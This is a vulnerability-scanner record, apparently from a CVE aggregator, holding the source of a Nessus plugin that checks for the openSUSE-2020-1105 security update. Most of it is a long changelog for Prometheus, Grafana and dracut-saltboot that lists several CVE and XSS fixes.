"OPENVAS:1361412562310143778", "OPENVAS:1361412562310876781", "OPENVAS:1361412562310877964"], "type": "openvas"}, {"idList": ["RH:CVE-2019-10215", "RH:CVE-2020-13379", "RH:CVE-2019-15043", "RH:CVE-2020-12245"], "type": "redhatcve"}, {"idList": ["CVE-2020-12245", "CVE-2019-15043", "CVE-2020-13379", "CVE-2019-10215"], "type": "cve"}, {"idList": ["FEDORA:B5BAF6085907", "FEDORA:77DCE3126D28", "FEDORA:6B2F331352FF", "FEDORA:E84B06062C8C"], "type": "fedora"}, {"idList": ["UB:CVE-2020-12245", "UB:CVE-2020-13379", "UB:CVE-2019-15043"], "type": "ubuntucve"}, {"idList": ["EDB-ID:48638"], "type": "exploitdb"}, {"idList": ["AVLEONOV:8D88294824DE33106DA78BF53C68AEB6"], "type": "avleonov"}, {"idList": ["MSF:ILITIES/SUSE-CVE-2020-12245/", "MSF:ILITIES/ORACLE_LINUX-CVE-2020-12245/", "MSF:ILITIES/REDHAT_LINUX-CVE-2020-12245/"], "type": "metasploit"}, {"idList": ["ASA-201908-21"], "type": "archlinux"}, {"idList": ["ELSA-2020-5726", "ELSA-2020-2641", "ELSA-2020-4682", "ELSA-2020-1659"], "type": "oraclelinux"}, {"idList": ["CENTOS8_RHSA-2020-1659.NASL", "REDHAT-RHSA-2020-2676.NASL", "CENTOS8_RHSA-2020-2641.NASL", "OPENSUSE-2020-892.NASL", "ORACLELINUX_ELSA-2020-2641.NASL", "FEDORA_2019-0BB6B876DA.NASL", "FEDORA_2019-77D612EAB4.NASL", "FEDORA_2020-A09E5BE0BE.NASL", "SUSE_SU-2020-1970-1.NASL", "REDHAT-RHSA-2020-1659.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:158320"], "type": "packetstorm"}, {"idList": ["ALSA-2020:4682"], "type": "almalinux"}], "rev": 2}, "score": {"modified": "2020-09-14T17:07:20", "rev": 2, "value": 7.1, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "139022", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1105.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(139022);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/13\");\n\n script_cve_id(\"CVE-2019-10215\", \"CVE-2019-15043\", \"CVE-2020-12245\", \"CVE-2020-13379\");\n\n script_name(english:\"openSUSE Security Update : SUSE Manager Client Tools (openSUSE-2020-1105)\");\n script_summary(english:\"Check for the openSUSE-2020-1105 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update fixes the following issues :\n\ndracut-saltboot :\n\n - Print a list of available disk devices (bsc#1170824)\n\n - Install wipefs to initrd\n\n - Force install crypt modules\n\ngolang-github-prometheus-prometheus :\n\n - Update change log and spec file\n\n + Modified spec file: default to golang 1.14 to avoid\n 'have choice' build issues in OBS. \n\n + Rebase and update patches for version 2.18.0\n\n - Update to 2.18.0 \n\n + Features \n\n - Tracing: Added experimental Jaeger support #7148\n\n + Changes\n\n - Federation: Only use local TSDB for federation (ignore\n remote read). #7096\n\n - Rules: `rule_evaluations_total` and\n `rule_evaluation_failures_total` have a `rule_group`\n label now. #7094\n\n + Enhancements\n\n - TSDB: Significantly reduce WAL size kept around after a\n block cut. #7098\n\n - Discovery: Add `architecture` meta label for EC2. #7000\n\n + Bug fixes\n\n - UI: Fixed wrong MinTime reported by /status. #7182\n\n - React UI: Fixed multiselect legend on OSX. #6880\n\n - Remote Write: Fixed blocked resharding edge case. #7122\n\n - Remote Write: Fixed remote write not updating on relabel\n configs change. #7073\n\n - Changes from 2.17.2\n\n + Bug fixes\n\n - Federation: Register federation metrics #7081\n\n - PromQL: Fix panic in parser error handling #7132\n\n - Rules: Fix reloads hanging when deleting a rule group\n that is being evaluated #7138\n\n - TSDB: Fix a memory leak when prometheus starts with an\n empty TSDB WAL #7135\n\n - TSDB: Make isolation more robust to panics in web\n handlers #7129 #7136\n\n - Changes from 2.17.1\n\n + Bug fixes\n\n - TSDB: Fix query performance regression that increased\n memory and CPU usage #7051\n\n - Changes from 2.17.0\n\n + Features \n\n - TSDB: Support isolation #6841\n\n - This release implements isolation in TSDB. API queries\n and recording rules are guaranteed to only see full\n scrapes and full recording rules. This comes with a\n certain overhead in resource usage. Depending on the\n situation, there might be some increase in memory usage,\n CPU usage, or query latency.\n\n + Enhancements\n\n - PromQL: Allow more keywords as metric names #6933\n\n - React UI: Add normalization of localhost URLs in targets\n page #6794\n\n - Remote read: Read from remote storage concurrently #6770\n\n - Rules: Mark deleted rule series as stale after a reload\n #6745\n\n - Scrape: Log scrape append failures as debug rather than\n warn #6852\n\n - TSDB: Improve query performance for queries that\n partially hit the head #6676\n\n - Consul SD: Expose service health as meta label #5313\n\n - EC2 SD: Expose EC2 instance lifecycle as meta label\n #6914\n\n - Kubernetes SD: Expose service type as meta label for K8s\n service role #6684\n\n - Kubernetes SD: Expose label_selector and field_selector\n #6807\n\n - Openstack SD: Expose hypervisor id as meta label #6962\n\n + Bug fixes\n\n - PromQL: Do not escape HTML-like chars in query log #6834\n #6795\n\n - React UI: Fix data table matrix values #6896\n\n - React UI: Fix new targets page not loading when using\n non-ASCII characters #6892\n\n - Remote read: Fix duplication of metrics read from remote\n storage with external labels #6967 #7018\n\n - Remote write: Register WAL watcher and live reader\n metrics for all remotes, not just the first one #6998\n\n - Scrape: Prevent removal of metric names upon relabeling\n #6891\n\n - Scrape: Fix 'superfluous response.WriteHeader call'\n errors when scrape fails under some circonstances #6986\n\n - Scrape: Fix crash when reloads are separated by two\n scrape intervals #7011\n\n - Changes from 2.16.0\n\n + Features \n\n - React UI: Support local timezone on /graph #6692\n\n - PromQL: add absent_over_time query function #6490\n\n - Adding optional logging of queries to their own file\n #6520\n\n + Enhancements\n\n - React UI: Add support for rules page and 'Xs ago'\n duration displays #6503\n\n - React UI: alerts page, replace filtering togglers tabs\n with checkboxes #6543\n\n - TSDB: Export metric for WAL write errors #6647\n\n - TSDB: Improve query performance for queries that only\n touch the most recent 2h of data. #6651\n\n - PromQL: Refactoring in parser errors to improve error\n messages #6634\n\n - PromQL: Support trailing commas in grouping opts #6480\n\n - Scrape: Reduce memory usage on reloads by reusing scrape\n cache #6670\n\n - Scrape: Add metrics to track bytes and entries in the\n metadata cache #6675\n\n - promtool: Add support for line-column numbers for\n invalid rules output #6533\n\n - Avoid restarting rule groups when it is unnecessary\n #6450\n\n + Bug fixes\n\n - React UI: Send cookies on fetch() on older browsers\n #6553\n\n - React UI: adopt grafana flot fix for stacked graphs\n #6603\n\n - React UI: broken graph page browser history so that back\n button works as expected #6659\n\n - TSDB: ensure compactionsSkipped metric is registered,\n and log proper error if one is returned from head.Init\n #6616\n\n - TSDB: return an error on ingesting series with duplicate\n labels #6664\n\n - PromQL: Fix unary operator precedence #6579\n\n - PromQL: Respect query.timeout even when we reach\n query.max-concurrency #6712\n\n - PromQL: Fix string and parentheses handling in engine,\n which affected React UI #6612\n\n - PromQL: Remove output labels returned by absent() if\n they are produced by multiple identical label matchers\n #6493\n\n - Scrape: Validate that OpenMetrics input ends with `#\n EOF` #6505\n\n - Remote read: return the correct error if configs can't\n be marshal'd to JSON #6622\n\n - Remote write: Make remote client `Store` use passed\n context, which can affect shutdown timing #6673\n\n - Remote write: Improve sharding calculation in cases\n where we would always be consistently behind by tracking\n pendingSamples #6511\n\n - Ensure prometheus_rule_group metrics are deleted when a\n rule group is removed #6693\n\n - Changes from 2.15.2\n\n + Bug fixes\n\n - TSDB: Fixed support for TSDB blocks built with\n Prometheus before 2.1.0. #6564\n\n - TSDB: Fixed block compaction issues on Windows. #6547\n\n - Changes from 2.15.1\n\n + Bug fixes\n\n - TSDB: Fixed race on concurrent queries against same\n data. #6512\n\n - Changes from 2.15.0\n\n + Features \n\n - API: Added new endpoint for exposing per metric metadata\n `/metadata`. #6420 #6442\n\n + Changes\n\n - Discovery: Removed `prometheus_sd_kubernetes_cache_*`\n metrics. Additionally\n `prometheus_sd_kubernetes_workqueue_latency_seconds` and\n `prometheus_sd_kubernetes_workqueue_work_duration_second\n s` metrics now show correct values in seconds. #6393\n\n - Remote write: Changed `query` label on\n `prometheus_remote_storage_*` metrics to `remote_name`\n and `url`. #6043\n\n + Enhancements\n\n - TSDB: Significantly reduced memory footprint of loaded\n TSDB blocks. #6418 #6461\n\n - TSDB: Significantly optimized what we buffer during\n compaction which should result in lower memory footprint\n during compaction. #6422 #6452 #6468 #6475\n\n - TSDB: Improve replay latency. #6230\n\n - TSDB: WAL size is now used for size based retention\n calculation. #5886\n\n - Remote read: Added query grouping and range hints to the\n remote read request #6401\n\n - Remote write: Added\n `prometheus_remote_storage_sent_bytes_total` counter per\n queue. #6344\n\n - promql: Improved PromQL parser performance. #6356\n\n - React UI: Implemented missing pages like `/targets`\n #6276, TSDB status page #6281 #6267 and many other fixes\n and performance improvements.\n\n - promql: Prometheus now accepts spaces between time range\n and square bracket. e.g `[ 5m]` #6065 \n\n + Bug fixes\n\n - Config: Fixed alertmanager configuration to not miss\n targets when configurations are similar. #6455\n\n - Remote write: Value of\n `prometheus_remote_storage_shards_desired` gauge shows\n raw value of desired shards and it's updated correctly.\n #6378\n\n - Rules: Prometheus now fails the evaluation of rules and\n alerts where metric results collide with labels\n specified in `labels` field. #6469\n\n - API: Targets Metadata API `/targets/metadata` now\n accepts empty `match_targets` parameter as in the spec.\n #6303\n\n - Changes from 2.14.0\n\n + Features \n\n - API: `/api/v1/status/runtimeinfo` and\n `/api/v1/status/buildinfo` endpoints added for use by\n the React UI. #6243\n\n - React UI: implement the new experimental React based UI.\n #5694 and many more\n\n - Can be found by under `/new`.\n\n - Not all pages are implemented yet.\n\n - Status: Cardinality statistics added to the Runtime &\n Build Information page. #6125\n\n + Enhancements\n\n - Remote write: fix delays in remote write after a\n compaction. #6021\n\n - UI: Alerts can be filtered by state. #5758\n\n + Bug fixes\n\n - Ensure warnings from the API are escaped. #6279\n\n - API: lifecycle endpoints return 403 when not enabled.\n #6057\n\n - Build: Fix Solaris build. #6149\n\n - Promtool: Remove false duplicate rule warnings when\n checking rule files with alerts. #6270\n\n - Remote write: restore use of deduplicating logger in\n remote write. #6113\n\n - Remote write: do not reshard when unable to send\n samples. #6111\n\n - Service discovery: errors are no longer logged on\n context cancellation. #6116, #6133\n\n - UI: handle null response from API properly. #6071\n\n - Changes from 2.13.1\n\n + Bug fixes\n\n - Fix panic in ARM builds of Prometheus. #6110\n\n - promql: fix potential panic in the query logger. #6094\n\n - Multiple errors of http: superfluous\n response.WriteHeader call in the logs. #6145\n\n - Changes from 2.13.0\n\n + Enhancements\n\n - Metrics: renamed prometheus_sd_configs_failed_total to\n prometheus_sd_failed_configs and changed to Gauge #5254\n\n - Include the tsdb tool in builds. #6089\n\n - Service discovery: add new node address types for\n kubernetes. #5902\n\n - UI: show warnings if query have returned some warnings.\n #5964\n\n - Remote write: reduce memory usage of the series cache.\n #5849\n\n - Remote read: use remote read streaming to reduce memory\n usage. #5703\n\n - Metrics: added metrics for remote write max/min/desired\n shards to queue manager. #5787\n\n - Promtool: show the warnings during label query. #5924\n\n - Promtool: improve error messages when parsing bad rules.\n #5965\n\n - Promtool: more promlint rules. #5515\n\n + Bug fixes\n\n - UI: Fix a Stored DOM XSS vulnerability with query\n history\n [CVE-2019-10215](http://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2019-10215). #6098\n\n - Promtool: fix recording inconsistency due to duplicate\n labels. #6026\n\n - UI: fixes service-discovery view when accessed from\n unhealthy targets. #5915\n\n - Metrics format: OpenMetrics parser crashes on short\n input. #5939\n\n - UI: avoid truncated Y-axis values. #6014\n\n - Changes from 2.12.0\n\n + Features \n\n - Track currently active PromQL queries in a log file.\n #5794\n\n - Enable and provide binaries for `mips64` / `mips64le`\n architectures. #5792\n\n + Enhancements\n\n - Improve responsiveness of targets web UI and API\n endpoint. #5740\n\n - Improve remote write desired shards calculation. #5763\n\n - Flush TSDB pages more precisely. tsdb#660\n\n - Add `prometheus_tsdb_retention_limit_bytes` metric.\n tsdb#667\n\n - Add logging during TSDB WAL replay on startup. tsdb#662\n\n - Improve TSDB memory usage. tsdb#653, tsdb#643, tsdb#654,\n tsdb#642, tsdb#627\n\n + Bug fixes\n\n - Check for duplicate label names in remote read. #5829\n\n - Mark deleted rules' series as stale on next evaluation.\n #5759\n\n - Fix JavaScript error when showing warning about\n out-of-sync server time. #5833\n\n - Fix `promtool test rules` panic when providing empty\n `exp_labels`. #5774\n\n - Only check last directory when discovering checkpoint\n number. #5756\n\n - Fix error propagation in WAL watcher helper functions.\n #5741\n\n - Correctly handle empty labels from alert templates.\n #5845\n\n - Update Uyuni/SUSE Manager service discovery patch\n\n + Adapt service discovery to the new Uyuni API endpoints\n\n + Modified spec file: force golang 1.12 to fix build\n issues in SLE15SP2\n\n - Update to Prometheus 2.11.2\n\ngrafana :\n\n - Update to version 7.0.3\n\n - Features / Enhancements\n\n - Stats: include all fields. #24829, @ryantxu\n\n - Variables: change VariableEditorList row action Icon to\n IconButton. #25217, @hshoff\n\n - Bug fixes\n\n - Cloudwatch: Fix dimensions of DDoSProtection. #25317,\n @papagian\n\n - Configuration: Fix env var override of sections\n containing hyphen. #25178, @marefr\n\n - Dashboard: Get panels in collapsed rows. #25079,\n @peterholmberg\n\n - Do not show alerts tab when alerting is disabled.\n #25285, @dprokop\n\n - Jaeger: fixes cascader option label duration value.\n #25129, @Estrax\n\n - Transformations: Fixed Transform tab crash & no update\n after adding first transform. #25152, @torkelo\n\n - Update to version 7.0.2\n\n - Bug fixes\n\n - Security: Urgent security patch release to fix\n CVE-2020-13379\n\n - Update to version 7.0.1\n\n - Features / Enhancements\n\n - Datasource/CloudWatch: Makes CloudWatch Logs query\n history more readable. #24795, @kaydelaney\n\n - Download CSV: Add date and time formatting. #24992,\n @ryantxu\n\n - Table: Make last cell value visible when right aligned.\n #24921, @peterholmberg\n\n - TablePanel: Adding sort order persistance. #24705,\n @torkelo\n\n - Transformations: Display correct field name when using\n reduce transformation. #25068, @peterholmberg\n\n - Transformations: Allow custom number input for binary\n operations. #24752, @ryantxu\n\n - Bug fixes\n\n - Dashboard/Links: Fixes dashboard links by tags not\n working. #24773, @KamalGalrani\n\n - Dashboard/Links: Fixes open in new window for dashboard\n link. #24772, @KamalGalrani\n\n - Dashboard/Links: Variables are resolved and limits to\n 100. #25076, @hugohaggmark\n\n - DataLinks: Bring back variables interpolation in title.\n #24970, @dprokop\n\n - Datasource/CloudWatch: Field suggestions no longer\n limited to prefix-only. #24855, @kaydelaney\n\n - Explore/Table: Keep existing field types if possible.\n #24944, @kaydelaney\n\n - Explore: Fix wrap lines toggle for results of queries\n with filter expression. #24915, @ivanahuckova\n\n - Explore: fix undo in query editor. #24797, @zoltanbedi\n\n - Explore: fix word break in type head info. #25014,\n @zoltanbedi\n\n - Graph: Legend decimals now work as expected. #24931,\n @torkelo\n\n - LoginPage: Fix hover color for service buttons. #25009,\n @tskarhed\n\n - LogsPanel: Fix scrollbar. #24850, @ivanahuckova\n\n - MoveDashboard: Fix for moving dashboard caused all\n variables to be lost. #25005, @torkelo\n\n - Organize transformer: Use display name in field order\n comparer. #24984, @dprokop\n\n - Panel: shows correct panel menu items in view mode.\n #24912, @hugohaggmark\n\n - PanelEditor Fix missing labels and description if there\n is only single option in category. #24905, @dprokop\n\n - PanelEditor: Overrides name matcher still show all\n original field names even after Field default display\n name is specified. #24933, @torkelo\n\n - PanelInspector: Makes sure Data display options are\n visible. #24902, @hugohaggmark\n\n - PanelInspector: Hides unsupported data display options\n for Panel type. #24918, @hugohaggmark\n\n - PanelMenu: Make menu disappear on button press. #25015,\n @tskarhed\n\n - Postgres: Fix add button. #25087, @phemmer\n\n - Prometheus: Fix recording rules expansion. #24977,\n @ivanahuckova\n\n - Stackdriver: Fix creating Service Level Objectives (SLO)\n datasource query variable. #25023, @papagian\n\n - Update to version 7.0.0 \n\n - Breaking changes\n\n - Removed PhantomJS: PhantomJS was deprecated in Grafana\n v6.4 and starting from Grafana v7.0.0, all PhantomJS\n support has been removed. This means that Grafana no\n longer ships with a built-in image renderer, and we\n advise you to install the Grafana Image Renderer plugin.\n\n - Dashboard: A global minimum dashboard refresh interval\n is now enforced and defaults to 5 seconds.\n\n - Interval calculation: There is now a new option Max data\n points that controls the auto interval $__interval\n calculation. Interval was previously calculated by\n dividing the panel width by the time range. With the new\n max data points option it is now easy to set $__interval\n to a dynamic value that is time range agnostic. For\n example if you set Max data points to 10 Grafana will\n dynamically set $__interval by dividing the current time\n range by 10.\n\n - Datasource/Loki: Support for deprecated Loki endpoints\n has been removed.\n\n - Backend plugins: Grafana now requires backend plugins to\n be signed, otherwise Grafana will not load/start them.\n This is an additional security measure to make sure\n backend plugin binaries and files haven't been tampered\n with. Refer to Upgrade Grafana for more information.\n\n - @grafana/ui: Forms migration notice, see @grafana/ui\n changelog\n\n - @grafana/ui: Select API change for creating custom\n values, see @grafana/ui changelog\n\n + Deprecation warnings\n\n - Scripted dashboards is now deprecated. The feature is\n not removed but will be in a future release. We hope to\n address the underlying requirement of dynamic dashboards\n in a different way. #24059\n\n - The unofficial first version of backend plugins together\n with usage of grafana/grafana-plugin-model is now\n deprecated and support for that will be removed in a\n future release. Please refer to backend plugins\n documentation for information about the new officially\n supported backend plugins.\n\n - Features / Enhancements\n\n - Backend plugins: Log deprecation warning when using the\n unofficial first version of backend plugins. #24675,\n @marefr\n\n - Editor: New line on Enter, run query on Shift+Enter.\n #24654, @davkal\n\n - Loki: Allow multiple derived fields with the same name.\n #24437, @aocenas\n\n - Orgs: Add future deprecation notice. #24502, @torkelo\n\n - Bug Fixes\n\n - @grafana/toolkit: Use process.cwd() instead of PWD to\n get directory. #24677, @zoltanbedi\n\n - Admin: Makes long settings values line break in settings\n page. #24559, @hugohaggmark\n\n - Dashboard: Allow editing provisioned dashboard JSON and\n add confirmation when JSON is copied to dashboard.\n #24680, @dprokop\n\n - Dashboard: Fix for strange 'dashboard not found' errors\n when opening links in dashboard settings. #24416,\n @torkelo\n\n - Dashboard: Fix so default data source is selected when\n data source can't be found in panel editor. #24526,\n @mckn\n\n - Dashboard: Fixed issue changing a panel from transparent\n back to normal in panel editor. #24483, @torkelo\n\n - Dashboard: Make header names reflect the field name when\n exporting to CSV file from the the panel inspector.\n #24624, @peterholmberg\n\n - Dashboard: Make sure side pane is displayed with tabs by\n default in panel editor. #24636, @dprokop\n\n - Data source: Fix query/annotation help content\n formatting. #24687, @AgnesToulet\n\n - Data source: Fixes async mount errors. #24579, @Estrax\n\n - Data source: Fixes saving a data source without failure\n when URL doesn't specify a protocol. #24497, @aknuds1\n\n - Explore/Prometheus: Show results of instant queries only\n in table. #24508, @ivanahuckova\n\n - Explore: Fix rendering of react query editors. #24593,\n @ivanahuckova\n\n - Explore: Fixes loading more logs in logs context view.\n #24135, @Estrax\n\n - Graphite: Fix schema and dedupe strategy in rollup\n indicators for Metrictank queries. #24685, @torkelo\n\n - Graphite: Makes query annotations work again. #24556,\n @hugohaggmark\n\n - Logs: Clicking 'Load more' from context overlay doesn't\n expand log row. #24299, @kaydelaney\n\n - Logs: Fix total bytes process calculation. #24691,\n @davkal\n\n - Org/user/team preferences: Fixes so UI Theme can be set\n back to Default. #24628, @AgnesToulet\n\n - Plugins: Fix manifest validation. #24573, @aknuds1\n\n - Provisioning: Use proxy as default access mode in\n provisioning. #24669, @bergquist\n\n - Search: Fix select item when pressing enter and Grafana\n is served using a sub path. #24634, @tskarhed\n\n - Search: Save folder expanded state. #24496, @Clarity-89\n\n - Security: Tag value sanitization fix in OpenTSDB data\n source. #24539, @rotemreiss\n\n - Table: Do not include angular options in options when\n switching from angular panel. #24684, @torkelo\n\n - Table: Fixed persisting column resize for time series\n fields. #24505, @torkelo\n\n - Table: Fixes Cannot read property subRows of null.\n #24578, @hugohaggmark\n\n - Time picker: Fixed so you can enter a relative range in\n the time picker without being converted to absolute\n range. #24534, @mckn\n\n - Transformations: Make transform dropdowns not cropped.\n #24615, @dprokop\n\n - Transformations: Sort order should be preserved as\n entered by user when using the reduce transformation.\n #24494, @hugohaggmark\n\n - Units: Adds scale symbol for currencies with suffixed\n symbol. #24678, @hugohaggmark\n\n - Variables: Fixes filtering options with more than 1000\n entries. #24614, @hugohaggmark\n\n - Variables: Fixes so Textbox variables read value from\n url. #24623, @hugohaggmark\n\n - Zipkin: Fix error when span contains remoteEndpoint.\n #24524, @aocenas\n\n - SAML: Switch from email to login for user login\n attribute mapping (Enterprise)\n\n - Update Makefile and spec file\n\n - Remove phantomJS patch from Makefile \n\n - Fix multiline strings in Makefile\n\n - Exclude s390 from SLE12 builds, golang 1.14 is not built\n for s390\n\n - Add instructions for patching the Grafana JavaScript\n frontend.\n\n - BuildRequires golang(API) instead of go metapackage\n version range\n\n - BuildRequires: golang(API) >= 1.14 from BuildRequires: (\n go >= 1.14 with go < 1.15 )\n\n - Update to version 6.7.3\n\n - This version fixes bsc#1170557 and its corresponding\n CVE-2020-12245\n\n - Admin: Fix Synced via LDAP message for non-LDAP external\n users. #23477, @alexanderzobnin\n\n - Alerting: Fixes notifications for alerts with empty\n message in Google Hangouts notifier. #23559,\n @hugohaggmark\n\n - AuthProxy: Fixes bug where long username could not be\n cached.. #22926, @jcmcken\n\n - Dashboard: Fix saving dashboard when editing raw\n dashboard JSON model. #23314, @peterholmberg\n\n - Dashboard: Try to parse 8 and 15 digit numbers as\n timestamps if parsing of time range as date fails.\n #21694, @jessetan\n\n - DashboardListPanel: Fixed problem with empty panel after\n going into edit mode (General folder filter being\n automatically added) . #23426, @torkelo\n\n - Data source: Handle datasource withCredentials option\n properly. #23380, @hvtuananh\n\n - Security: Fix annotation popup XSS vulnerability.\n #23813, @torkelo\n\n - Server: Exit Grafana with status code 0 if no error.\n #23312, @aknuds1\n\n - TablePanel: Fix XSS issue in header column rename\n (backport). #23814, @torkelo\n\n - Variables: Fixes error when setting adhoc variable\n values. #23580, @hugohaggmark\n\n - Update to version 6.7.2: (see installed changelog for\n the full list of changes)\n\n - BackendSrv: Adds config to response to fix issue for\n external plugins that used this property . #23032,\n @torkelo\n\n - Dashboard: Fixed issue with saving new dashboard after\n changing title . #23104, @dprokop\n\n - DataLinks: make sure we use the correct datapoint when\n dataset contains null value.. #22981, @mckn\n\n - Plugins: Fixed issue for plugins that imported dateMath\n util . #23069, @mckn\n\n - Security: Fix for dashboard snapshot original dashboard\n link could contain XSS vulnerability in url. #23254,\n @torkelo\n\n - Variables: Fixes issue with too many queries being\n issued for nested template variables after value change.\n #23220, @torkelo\n\n - Plugins: Expose promiseToDigest. #23249, @torkelo\n\n - Reporting (Enterprise): Fixes issue updating a report\n created by someone else\n\n - Update to 6.7.1: (see installed changelog for the full\n list of changes) Bug Fixes\n\n - Azure: Fixed dropdowns not showing current value.\n #22914, @torkelo\n\n - BackendSrv: only add content-type on POST, PUT requests.\n #22910, @hugohaggmark\n\n - Panels: Fixed size issue with panel internal size when\n exiting panel edit mode. #22912, @torkelo\n\n - Reporting: fixes migrations compatibility with mysql\n (Enterprise)\n\n - Reporting: Reduce default concurrency limit to 4\n (Enterprise)\n\n - Update to 6.7.0: (see installed changelog for the full\n list of changes) Bug Fixes\n\n - AngularPanels: Fixed inner height calculation for\n angular panels . #22796, @torkelo\n\n - BackendSrv: makes sure provided headers are correctly\n recognized and set. #22778, @hugohaggmark\n\n - Forms: Fix input suffix position (caret-down in Select)\n . #22780, @torkelo\n\n - Graphite: Fixed issue with query editor and next select\n metric now showing after selecting metric node . #22856,\n @torkelo\n\n - Rich History: UX adjustments and fixes. #22729,\n @ivanahuckova\n\n - Update to 6.7.0-beta1: Breaking changes\n\n - Slack: Removed Mention setting and instead introduce\n Mention Users, Mention Groups, and Mention Channel. The\n first two settings require user and group IDs,\n respectively. This change was necessary because the way\n of mentioning via the Slack API changed and mentions in\n Slack notifications no longer worked.\n\n - Alerting: Reverts the behavior of diff and percent_diff\n to not always be absolute. Something we introduced by\n mistake in 6.1.0. Alerting now support diff(),\n diff_abs(), percent_diff() and percent_diff_abs().\n #21338\n\n - Notice about changes in backendSrv for plugin authors In\n our mission to migrate away from AngularJS to React we\n have removed all AngularJS dependencies in the core data\n retrieval service backendSrv. Removing the AngularJS\n dependencies in backendSrv has the unfortunate side\n effect of AngularJS digest no longer being triggered for\n any request made with backendSrv. Because of this,\n external plugins using backendSrv directly may suffer\n from strange behaviour in the UI. To remedy this issue,\n as a plugin author you need to trigger the digest after\n a direct call to backendSrv. Bug Fixes API: Fix redirect\n issues. #22285, @papagian Alerting: Don't include\n image_url field with Slack message if empty. #22372,\n @aknuds1 Alerting: Fixed bad background color for\n default notifications in alert tab . #22660, @krvajal\n Annotations: In table panel when setting transform to\n annotation, they will now show up right away without a\n manual refresh. #22323, @krvajal Azure Monitor: Fix app\n insights source to allow for new __timeFrom and\n __timeTo. #21879, @ChadNedzlek BackendSrv: Fixes POST\n body for form data. #21714, @hugohaggmark CloudWatch:\n Credentials cache invalidation fix. #22473, @sunker\n CloudWatch: Expand alias variables when query yields no\n result. #22695, @sunker Dashboard: Fix bug with NaN in\n alerting. #22053, @a-melnyk Explore: Fix display of\n multiline logs in log panel and explore. #22057,\n @thomasdraebing Heatmap: Legend color range is incorrect\n when using custom min/max. #21748, @sv5d Security: Fixed\n XSS issue in dashboard history diff . #22680, @torkelo\n StatPanel: Fixes base color is being used for null\n values . #22646, @torkelo\n\n - Update to version 6.6.2: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.6.1: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.6.0: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.3: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.2: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.1: (see installed changelog for\n the full list of changes)\n\n - Update to version 6.5.0 (see installed changelog for the\n full list of changes)\n\n - Update to version 6.4.5 :\n\n - Create version 6.4.5\n\n - CloudWatch: Fix high CPU load (#20579)\n\n - Add obs-service-go_modules to download required modules\n into vendor.tar.gz\n\n - Adjusted spec file to use vendor.tar.gz\n\n - Adjusted Makefile to work with new filenames\n\n - BuildRequire go1.14\n\n - Update to version 6.4.4 :\n\n - DataLinks: Fix blur issues. #19883, @aocenas\n\n - Docker: Makes it possible to parse timezones in the\n docker image. #20081, @xlson\n\n - LDAP: All LDAP servers should be tried even if one of\n them returns a connection error. #20077, @jongyllen\n\n - LDAP: No longer shows incorrectly matching groups based\n on role in debug page. #20018, @xlson\n\n - Singlestat: Fix no data / null value mapping . #19951,\n @ryantxu\n\n - Revert the spec file and make script\n\n - Remove PhantomJS dependency\n\n - Update to 6.4.3\n\n - Bug Fixes\n\n - Alerting: All notification channels should send even if\n one fails to send. #19807, @jan25\n\n - AzureMonitor: Fix slate interference with dropdowns.\n #19799, @aocenas\n\n - ContextMenu: make ContextMenu positioning aware of the\n viewport width. #19699, @krvajal\n\n - DataLinks: Fix context menu not showing in\n singlestat-ish visualisations. #19809, @dprokop\n\n - DataLinks: Fix url field not releasing focus. #19804,\n @aocenas\n\n - Datasource: Fixes clicking outside of some query editors\n required 2 clicks. #19822, @aocenas\n\n - Panels: Fixes default tab for visualizations without\n Queries Tab. #19803, @hugohaggmark\n\n - Singlestat: Fixed issue with mapping null to text.\n #19689, @torkelo\n\n - @grafana/toolkit: Don't fail plugin creation when git\n user.name config is not set. #19821, @dprokop\n\n - @grafana/toolkit: TSLint line number off by 1. #19782,\n @fredwangwang\n\n - Update to 6.4.2\n\n - Bug Fixes\n\n - CloudWatch: Changes incorrect dimension wmlid to wlmid .\n #19679, @ATTron\n\n - Grafana Image Renderer: Fixes plugin page. #19664,\n @hugohaggmark\n\n - Graph: Fixes auto decimals logic for y axis ticks that\n results in too many decimals for high values. #19618,\n @torkelo\n\n - Graph: Switching to series mode should re-render graph.\n #19623, @torkelo\n\n - Loki: Fix autocomplete on label values. #19579, @aocenas\n\n - Loki: Removes live option for logs panel. #19533,\n @davkal\n\n - Profile: Fix issue with user profile not showing more\n than sessions sessions in some cases. #19578,\n @huynhsamha\n\n - Prometheus: Fixes so results in Panel always are sorted\n by query order. #19597, @hugohaggmark\n\n - ShareQuery: Fixed issue when using -- Dashboard --\n datasource (to share query result) when dashboard had\n rows. #19610, @torkelo\n\n - Show SAML login button if SAML is enabled. #19591,\n @papagian\n\n - SingleStat: Fixes postfix/prefix usage. #19687,\n @hugohaggmark\n\n - Table: Proper handling of json data with dataframes.\n #19596, @marefr\n\n - Units: Fixed wrong id for Terabits/sec. #19611,\n @andreaslangnevyjel\n\n - Changes from 6.4.1\n\n - Bug Fixes\n\n - Provisioning: Fixed issue where empty nested keys in\n YAML provisioning caused a server crash, #19547\n\n - ImageRendering: Fixed issue with image rendering in\n enterprise build (Enterprise)\n\n - Reporting: Fixed issue with reporting service when STMP\n was disabled (Enterprise).\n\n - Changes from 6.4.0\n\n - Features / Enhancements\n\n - Build: Upgrade go to 1.12.10. #19499, @marefr\n\n - DataLinks: Suggestions menu improvements. #19396,\n @dprokop\n\n - Explore: Take root_url setting into account when\n redirecting from dashboard to explore. #19447,\n @ivanahuckova\n\n - Explore: Update broken link to logql docs. #19510,\n @ivanahuckova\n\n - Logs: Adds Logs Panel as a visualization. #19504,\n @davkal\n\n - Bug Fixes\n\n - CLI: Fix version selection for plugin install. #19498,\n @aocenas\n\n - Graph: Fixes minor issue with series override color\n picker and custom color . #19516, @torkelo\n\n - 